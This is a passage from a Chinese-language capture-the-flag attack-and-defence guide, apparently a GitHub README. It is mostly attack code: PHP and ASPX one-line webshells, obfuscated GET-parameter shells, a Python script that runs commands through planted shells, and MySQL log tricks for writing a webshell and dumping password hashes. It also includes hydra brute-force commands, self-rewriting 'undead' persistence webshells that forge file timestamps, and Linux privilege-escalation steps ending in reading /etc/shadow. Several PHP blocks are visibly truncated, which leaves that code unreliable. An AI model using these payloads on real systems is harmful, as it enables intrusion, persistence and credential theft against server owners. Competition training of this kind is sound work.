搜集最新版本的CMS,以及对应的漏洞Poc和Exp,这里仅仅列举部分CMS: 519 | 520 | - Aspcms 521 | - Dedecms 522 | - Dicuz 523 | - Drupal 524 | - Empirecms 525 | - Eshop 526 | - Finecms 527 | - Joomla 528 | - Lamp 529 | - Metainfo 530 | - Phpcms 531 | - Phpwind 532 | - Qibocms 533 | - Seacms 534 | - Semcms 535 | - ThinkPHP 536 | - Wolfcms 537 | - Wordpress 538 | - Zabbix 539 | 540 | 备份文件爆破:使用7kbScan等目录扫描工具对Web系统进行爆破 541 | 542 | #### 3.2.4 上传WebShell 543 | 544 | 常见一句话木马 545 | 546 | ```php 547 | PHP: 549 | Aspx: <%@ Page Language="Jscript"%> <%eval(Request.Item["pass"],"unsafe");%> 550 | ``` 551 | 552 | Get型木马 553 | 554 | ```php 555 | /'^'{{{{';@${$_}[_](@${$_}[__]); //执行GET传参 ?_=system&__=whoami 来执行whoami命令 562 | /'^'{{{{';$___='$+4(/' ^ '{{{{{';@${$_}[_](@${$___}[__]); //执行GET传参 ?_=assert 和POST传参 __=PHP代码来GetShell 563 | ``` 564 | 565 | 隐藏的文件读取 566 | 567 | ```php 568 | curl "http://192.168.182.130:8801/include/shell.php" -d "admin_ccmd=system('cat /f*');" 580 | //向shell.php文件里传入参数并返回结果 581 | ``` 582 | 583 | Python多端口传参 584 | 585 | ```python 586 | #coding=utf-8 587 | import requests 588 | 589 | url_head="http://192.168.182.130" #网段 590 | url="" 591 | shell_addr="/upload/url/shell.php" #木马路径 592 | passwd="pass" #木马密码 593 | #port="80" 594 | payload = {passwd: 'System(\'cat /flag\');'} 595 | # find / -name "flag*" 596 | 597 | #清空上次记录 598 | flag=open("flag.txt","w") 599 | flag.close() 600 | flag=open("flag.txt","a") 601 | 602 | for i in range(8000,8004): 603 | url=url_head+":"+str(i)+shell_addr 604 | try: 605 | res=requests.post(url,payload)#,timeout=1 606 | if res.status_code == requests.codes.ok: 607 | result = res.text 608 | print (result) 609 | flag.write(result+"\n") 610 | else: 611 | print ("shell 404") 612 | except: 613 | print (url+" connect shell fail") 614 | 615 | flag.close() 616 | ``` 617 | 618 | #### 3.2.6 MySQL数据库利用 619 | 620 | 具体可以看这篇文章:[https://blog.zgsec.cn/archives/26.html](https://blog.zgsec.cn/archives/26.html) 621 | 622 | 1、查看MySQL版本 623 | 624 | ```sql 625 | show variables like '%version%'; 626 | select version(); #这个只显示MySQL版本号 627 | ``` 628 | 629 | 2、查看 `load_file()` 开启状态 630 | 631 | ```sql 632 | show variables like '%secure%'; #这条可查看详细信息 633 | show global variables like '%secure_file_priv%'; 634 | ``` 635 | 636 | 3、查看日志功能是否开启和对应目录 637 | 638 | ```sql 639 | SHOW VARIABLES LIKE 'general%'; 640 | set global general_log = "ON"; 641 | set global general_log_file='/var/www/html/test.php'; #可以写入WebShell然后直接连接蚁剑 642 | 643 | # 往日志里面写入 WebShell 644 | select ''; 645 | # 此时已经写到 test.php 文件当中了,注意这个要知道网站的具体路径才可以实现 646 | ``` 647 | 648 | 小技巧:获取MySQL账户和对应密码Hash 649 | 650 | ```sql 651 | # MySQL <= 5.6 版本 652 | select host, user, password from mysql.user; 653 | 654 | # MySQL >= 5.7 版本 655 | select host,user,authentication_string from mysql.user; 656 | ``` 657 | 658 | #### 3.2.7 弱口令爆破 659 | 660 | 爆破SSH密码 661 | 662 | ```c 663 | hydra -L 用户名字典.txt -P 密码字典.txt 目标IP地址 ssh 664 | hydra -L 用户名字典.txt -P 密码字典.txt ssh://192.168.1.100 665 | hydra -L 用户名字典.txt -P 密码字典.txt ssh://192.168.1.100 -s 40 //40是⽬标服务开放的端⼝ 666 | ``` 667 | 668 | 爆破FTP密码 669 | 670 | ```c 671 | hydra -L 用户名字典.txt -P 密码字典.txt 目标IP地址 ftp 672 | hydra -L 用户名字典.txt -P 密码字典.txt ftp://192.168.1.100/ 673 | ``` 674 | 675 | 爆破RDP远程桌面密码 676 | 677 | ```c 678 | hydra 目标IP地址 rdp -l administrator -P 密码字典.txt -V 679 | ``` 680 | 681 | 爆破Telnet 682 | 683 | ```c 684 | hydra 目标IP地址 telnet -l 用户字典.txt -P 密码字典.txt -f -V 685 | ``` 686 | 687 | 爆破MSSQL数据库 688 | 689 | ```c 690 | hydra -l sa -P 密码字典.txt 目标IP地址 mssql 691 | ``` 692 | 693 | 爆破MySQL数据库 694 | 695 | ```c 696 | hydra -L 用户名字典.txt -P 密码字典.txt 目标IP地址 mysql 697 | ``` 698 | 699 | ### 3.3# 内网渗透 700 | 701 | #### 3.3.1 权限维持之不死马 702 | 703 | 简单不死马: 704 | 705 | ```php 706 | '); //创建shell.php 714 | sleep(0); //间隔时间 715 | } 716 | ``` 717 | 718 | 可以通过不断复写 `shell.php` 来达到该木马难以被使用的效果 719 | 720 | 防连接不死马: 721 | 722 | ```php 723 | '); //创建shell.php 730 | sleep(0); 731 | } 732 | 733 | //passwd=AabyssTeam 734 | //POST传参:passwd=AabyssTeam&cmd=system('ls'); 735 | ``` 736 | 737 | 进阶不死马: 738 | 739 | ```php 740 | '; 746 | 747 | while (1){ 748 | file_put_contents($file,$code); 749 | system('touch -m -d "2020-12-01 09:10:12" shell.php'); //修改时间,防止被删 750 | usleep(5000); 751 | } 752 | ?> 753 | 754 | //passwd=AabyssTeam 755 | //POST传参:passwd=AabyssTeam&cmd=system('ls'); 756 | ``` 757 | 758 | 将这个文件上传到服务器,然后进行访问,会在该路径下一直生成一个名字为 `shell.php` 的WebShell文件 759 | 760 | 双重不死马: 761 | 762 | ```php 763 | '; 770 | 771 | while (1){ 772 | file_put_contents($file,$code); 773 | system('touch -m -d "2020-12-01 18:10:12" .login.php'); 774 | file_put_contents($file1,$code); 775 | system('touch -m -d "2020-12-01 18:10:12" /admin/.register.php'); 776 | usleep(5000); 777 | } 778 | ?> 779 | 780 | //passwd=AabyssTeam 781 | //POST传参:passwd=AabyssTeam&cmd=system('ls'); 782 | ``` 783 | 784 | 浏览器访问写入的WebShell,会自动生成两个不死马: `.login.php` 和 `/admin/.register.php` 785 | 786 | #### 3.3.2 关键文件检索 787 | 788 | 组件检索 789 | 790 | ```c 791 | find / -name "apaech2.conf" //检索Apache主配置文件 792 | find / -name "nginx.conf" //检索Nginx目录 793 | find / -path "*nginx*" -name nginx*conf //检索Nginx配置目录 794 | find / -name "httpd.conf" //检索Apache目录 795 | find / -path "*apache*" -name apache*conf //检索Apache配置目录 796 | ``` 797 | 798 | 网站首页 799 | 800 | ```c 801 | find / -name "index.php" //定位网站目录 802 | find / -name "index.html" //定位网站目录 803 | ``` 804 | 805 | 日志文件检索 806 | 807 | ```c 808 | /var/log/nginx/ //默认Nginx日志目录 809 | /var/log/apache/ //默认Apache日志目录 810 | /var/log/apache2/ //默认Apache日志目录 811 | /usr/local/tomcat/logs //Tomcat日志目录 812 | tail -f xxx.log //实时刷新滚动日志文件 813 | ``` 814 | 815 | #### 3.3.3 Linux提权 816 | 817 | 查询系统版本信息命令: 818 | 819 | ```c 820 | cat /etc/issue 821 | cat /etc/*-release 822 | cat /etc/lsb-release 823 | cat /etc/redhat-release 824 | ``` 825 | 826 | 查询内核版本信息命令: 827 | 828 | ```c 829 | uname -a 830 | uname -mrs 831 | cat /proc/version 832 | cat /etc/issue 833 | lsb_release -a 834 | hostnamectl 835 | rpm -q kernel 836 | dmesg | grep Linux 837 | ls /boot | grep vmlinuz 838 | ``` 839 | 840 | 查看系统环境变量命令: 841 | 842 | ```c 843 | cat /etc/profile 844 | cat /etc/bashrc 845 | cat ~/.bash_profile 846 | cat ~/.bashrc 847 | cat ~/.bash_logout 848 | env 849 | set 850 | ``` 851 | 852 | 查看语言环境信息命令: 853 | 854 | ```c 855 | find / -name perl* 856 | find / -name python* 857 | find / -name gcc* 858 | find / -name cc 859 | set 860 | ``` 861 | 862 | 查看文件上传环境信息命令: 863 | 864 | ```c 865 | find / -name wget 866 | find / -name nc* 867 | find / -name netcat* 868 | find / -name tftp* 869 | find / -name ftp 870 | ``` 871 | 872 | 这里列举一些可用利用的提权漏洞: 873 | 874 | - CVE-2023-0386(Linux OverlayFS权限提升漏洞) 875 | - CVE-2021-4034(Linux Polkit本地权限提升漏洞) 876 | - CVE-2017-6074 (DCCP双重释放漏洞 > 2.6.18 ) 877 | - CVE-2016-5195(脏牛,kernel 2.6.22 < 3.9 (x86/x64)) 878 | - CVE-2016-8655(Ubuntu 12.04、14.04,Debian 7、8) 879 | - CVE-2017-1000367(sudo本地提权漏洞 ) 880 | - CVE-2016-1247(Nginx权限提升漏洞) 881 | - CVE-2017-16995(Ubuntu16.04 kernel:4.14-4.4) 882 | 883 | Kali命令查询: 884 | 885 | ``` 886 | searchsploit CentOS 7 887 | searchsploit Ubuntu 16.04 888 | ``` 889 | 890 | 提权Exploit寻找: 891 | 892 | - [http://www.exploit-db.com](http://www.exploit-db.com) 893 | - [http://metasploit.com/modules/](http://metasploit.com/modules/) 894 | - [http://securityreason.com](http://securityreason.com) 895 | - [http://seclists.org/fulldisclosure/](http://seclists.org/fulldisclosure/) 896 | - [https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/tree/main](https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/tree/main) 897 | 898 | 编译提权Exp 899 | 900 | ``` 901 | gcc -o /usr/share/nginx/html/***** /usr/share/nginx/html/*****.c -Wall 902 | ``` 903 | 904 | 直接提权,确认权限: 905 | 906 | ``` 907 | cat /etc/shadow 908 | ``` 909 | 910 | 其他提权姿势:[https://www.freebuf.com/articles/system/244627.html](https://www.freebuf.com/articles/system/244627.html) 911 | 912 | #### 3.3.4 Windows提权 913 | 914 | 这里列举一些Windows的漏洞: 915 | 916 | - 各种Potato(Github上面基本都有) 917 | - CVE-2023-35359(Windows内核权限提升漏洞,开源了) 918 | - CVE-2022-24521(没有Exp的可以找我要) 919 | - CVE-2019-1405 920 | - CVE-2019-1322 921 | - MS17-017(整型溢出漏洞) 922 | 923 | 924 | 925 | ## 4# 参考链接 926 | 927 | - [http://freebuf.com/](http://freebuf.com/) 928 | - [https://blog.zgsec.cn/](https://blog.zgsec.cn/) 929 | - [https://paper.seebug.org/3044/](https://paper.seebug.org/3044/) 930 | - [https://www.anquanke.com/](https://www.anquanke.com/) 931 | - [https://www.exploit-db.com/](https://www.exploit-db.com/) 932 | - [http://www.bugscan.net/source/template/vulns/](http://www.bugscan.net/source/template/vulns/) 933 | - [https://xz.aliyun.com/t/12687](https://xz.aliyun.com/t/12687) 934 | 935 | 936 | 937 | ## 5# 感谢各位师傅🙏 938 | 939 | ## Stargazers 940 | 941 | [![Stargazers repo roster for @AabyssZG/AWD-Guide](http://reporoster.com/stars/AabyssZG/AWD-Guide)](https://github.com/AabyssZG/AWD-Guide/stargazers) 942 | 943 | 944 | ## Forkers 945 | 946 | [![Forkers repo roster for @AabyssZG/AWD-Guide](http://reporoster.com/forks/AabyssZG/AWD-Guide)](https://github.com/AabyssZG/AWD-Guide/network/members) 947 | --------------------------------------------------------------------------------